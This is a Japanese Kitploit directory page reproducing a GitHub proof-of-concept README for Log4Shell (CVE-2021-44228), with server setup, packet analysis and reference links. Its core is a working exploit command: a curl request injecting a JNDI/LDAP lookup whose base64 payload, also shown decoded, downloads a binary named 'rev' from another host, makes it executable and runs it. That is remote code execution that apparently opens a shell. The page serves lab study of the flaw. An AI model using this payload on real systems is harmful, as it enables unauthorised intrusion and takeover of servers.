Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
LOG4J-CVE-2021-44228 — Log4Shell(CVE-2021-44228)の概念実証。JNDIインジェクションを介したリモートコード実行を実証し、脆弱なサーバーセットアップ、エクスプロイトコマンド、パケット分析を含みます。 | Kitploit
ツール/GitHubGitHub/sumitpathania03/log4j-cve-2021-44228
パケットスニッフィングと分析ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールArchived
GitHubsumitpathania03/log4j-cve-2021-44228

LOG4J-CVE-2021-44228

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →

Log4Shell(CVE-2021-44228)の概念実証。JNDIインジェクションを介したリモートコード実行を実証し、脆弱なサーバーセットアップ、エクスプロイトコマンド、パケット分析を含みます。

リポジトリを見る
83年前未レビュー
共有

LOG4J-CVE-2021-44228

Log4Shell — CVE-2021-44228としても知られる — は、Apache FoundationのLog4jを使用するシステムにおいてリモートコード実行を可能にする深刻な脆弱性です。Log4jは、商用・オープンソースのソフトウェア製品やユーティリティで広く利用されているオープンソースのJavaライブラリです。

0_6ImDNNYn_uGlIgog

POC分析

脆弱なサーバーはポート8080で動作しています

Screenshot 2023-04-11 115553

そして、ldapサーバーは2つのポート(http 8888 と ldap 1389)で動作しています

Screenshot 2023-04-11 115631

エクスプロイトコマンド

curl 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://172.17.0.1:1389/Basic/Command/Base64/d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==}'

{

172.17.0.2:8080 -- 脆弱なサーバーのIP

172.17.0.1:1389 -- LDAPサーバーのIP

Base64 -- d2dldCBodHRwczovLzEwLjAuMi4xNTo4MDAwL3JldiAtTyAvdG1wL3JldiAmJiBjaG1vZCAreCAvdG1wL3JldiAmJiAvdG1wL3Jldg==

復号化されたコマンド - wget https://10.0.2.15:8000/rev -O /tmp/rev && chmod +x /tmp/rev && /tmp/rev

}

パケット分析

PACKETS

flowgraph

パケットからわかるように、サーバーはLDAPサーバーにクラスのGETリクエストを送信しています。エクスプロイトクラスを確認すると、LDAPサーバーがエクスプロイトクラス内で復号化されたコマンドを送信していることがわかります。

EXP_CLASS

参照

https://github.com/simrotion13/log4shell-vulnerable-app

https://github.com/black9/Log4shell_JNDIExploit.git

ツールをダウンロード